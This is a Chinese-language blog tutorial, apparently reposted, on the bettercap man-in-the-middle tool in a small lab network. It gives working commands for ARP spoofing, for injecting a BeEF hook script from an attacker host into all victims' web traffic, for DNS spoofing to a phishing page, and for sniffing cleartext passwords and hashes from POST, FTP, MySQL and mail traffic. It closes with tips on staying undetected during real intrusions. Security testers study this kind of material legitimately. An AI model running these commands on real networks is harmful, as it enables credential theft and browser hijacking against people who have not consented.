轻量高效的 MITMF [ bettercap ]

华盟原创文章投稿奖励计划

0x01 关于bettercap:

一款相对还不错的中间人工具,出来也有些年头了,不过貌似维护的并不是特别勤快

从名字就不难看出,作者似乎是有意在向我们说明,这是一款比ettercap更好的中间人工具,'b' is better ^_^

此外,工具本身基于ruby,官方要求的 ruby版本为 >= 1.9

0x02 基本介绍:

ubuntu 16.04.3 LTS ip: 192.168.3.12    入侵者机器

win2008r2cn ip: 192.168.3.23    模拟正常服务器,事先已准备好各种服务

win2008cn ip: 192.168.3.131   模拟正常服务器,事先已准备好各种服务

win2012r2cn ip: 192.168.3.122   模拟正常服务器,事先已准备好各种服务

0x03 首先,安装好bettercap,如果你系统的ruby版本小于1.9记得务必先升级一下,更多详情请参考其官方说明,如下

# apt-add-repository ppa:brightbox/ruby-ng

# apt-get update

# apt-get install ruby2.3 ruby2.3-dev

安装一些必要的基础依赖库

# apt-get install build-essential ruby-dev libpcap-dev net-tools

通过gem安装bettercap,安装成功后,我们就可以继续后面的内容了

# gem install bettercap

# echo $?

轻量高效的 MITMF [ bettercap ]

0x04 常规选项用法:

-I 指定要嗅探欺骗的网卡接口

--use-mac 使用自定义mac

--random-mac 使用随机mac

-G 指定网关ip

-T 指定要嗅探的目标机器,可以是单个机器,亦可是多个机器,默认不指定会直接欺骗同内网下的所有机器[不过,实际中最好不要这样干]

--no-discovery 不启用主机发现模块,直接使用当前机器的arp缓存[即arp -a的内容],默认会自动启动

-O 将流过的所有数据都记录到指定的文件中,在实战中建议指定该选项,便于后续下载到本地仔细分析

0x05 主要功能选项[欺骗及嗅探器]:

-S  启用欺骗功能,默认就会开启,且默认使用的是ARP欺骗,你也可以用更偏上层协议,如,ICMP,HSRP...

-X  启用嗅探器,注意,光启用spoofer单单只是让其它机器的流量经过自己,而嗅探器则是用来抓取这些流量中的密码

-P  抓取指定类型的数据,主要是针对各类明文密码及访问记录,如,FTP,POST,MYSQL...默认会抓取所有类型,为了利于后期分析,建议指定类型

0x06 使用各种协议的透明代理功能,我们可以拿它来观察目标机器的访问记录,甚至可以直接往里注入恶意流量,注意,当http代理功能开启后,ssltrip也会自动开启:

--proxy 启用http代理,这个也可能是最常用的,除了http,它也支持https,tcp,udp及自定义代理流量

--proxy-module injecthtml,injectjs,redirect,injectcss 往来回的http流量中注入恶意数据

如,在来往的的http流量中注入恶意js,主动让同内网下的所有浏览器上线,这里只是为了简单演示效果,才用的beef,实际中可以换成更好一点的xss平台,从上面选项中我们看到,除了注入js,html,css都是支持的

# bettercap -I ens33 -S ARP --proxy --proxy-module injectjs --js-url "http://*.3.10/hook.js" -G 192.168.3.1 -T 192.168.3.120-135轻量高效的 MITMF [ bettercap ]轻量高效的 MITMF [ bettercap ]

0x07 利用http server和--dns功能,进行dns欺骗进行钓鱼,这里有个不好的地方,就是dns缓存会在目标机器上持续很久,必须手工刷新缓存才行,而且被劫持以后,当用户访问别的域名有时是访问不了的,另外,bettercap似乎并不依靠系统内核进行转发,挺好

编辑dns解析文件,意思就是将所有访问freebuf.com的流量都重定向到本地的web服务器上

# vi dns.txt

  local .*freebuf.com

# bettercap --httpd --httpd-port 80 --httpd-path=/root/hacked.html --dns dns.conf

# ipconfig /flushdns 污染完了以后,记得顺手把dns缓存清一下轻量高效的 MITMF [ bettercap ]轻量高效的 MITMF [ bettercap ]

0x08 其它的一些常规用法

尝试抓取http POST数据中的各类明文密码:

# bettercap -I ens33 -S ARP -X -P POST -G 192.168.3.1 -T 192.168.3.131

轻量高效的 MITMF [ bettercap ]

轻量高效的 MITMF [ bettercap ]

抓各类服务明文及hash,这里只是随便演示几个,支持的服务和工具比较多,不过用法都非常简单,大家可执行查看其帮助:

# bettercap -I ens33 -S ARP -X -P "MAIL,FTP,MYSQL" -G 192.168.3.1 -T 192.168.3.120-135

轻量高效的 MITMF [ bettercap ]轻量高效的 MITMF [ bettercap ]

小结:

工具基本属于全程傻瓜化的那种,虽然,目前还有些小瑕疵,不过用用还是可以的,在实战中可能最多就是用它来抓抓密码,自己实战中也用过几次,说实话,效果并没想象的那么好,其它的那些花哨功能,在实战也并不太建议用,内网毕竟不像web,稍有不慎,极易被发现,权限万一丢了,再想拿回来就费劲了,一切还以稳定为主,另外,工具比较轻量[起码自己感觉确实比ettercap温柔多了,暂时还没出现过把对方搞掉的情况],程序结构化非常分明,用什么开什么即可,避免动静过大,有些功能可能会默认开,如spoofer 功能,如果没必要用它,直接-S NONE即可,废话不多讲,大家还是自行在实战中多多体会吧,另外,由于篇幅原因,没法每一项都介绍的非常详细,官方已经为我们提供了非常详细的使用说明,英文还可以的朋友,可以直接去读一手文档,相信只要不是英文烂到没朋友的那种,基本都能轻松看懂,其实,自己很多也都是参考其官方文档来的,最后,如果目标是Ubuntu14.04以上的系统还是非常值得尝试的,否则这个ruby环境在其它系统中搞起来可能会比较麻烦,祝好运 ^_^

本文仅供学习研究使用,不得用于非法途径

文章来源:klion's blog

原文链接:https://klionsec.github.io/2017/11/06/bettercap/

本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/228379.html

发表评论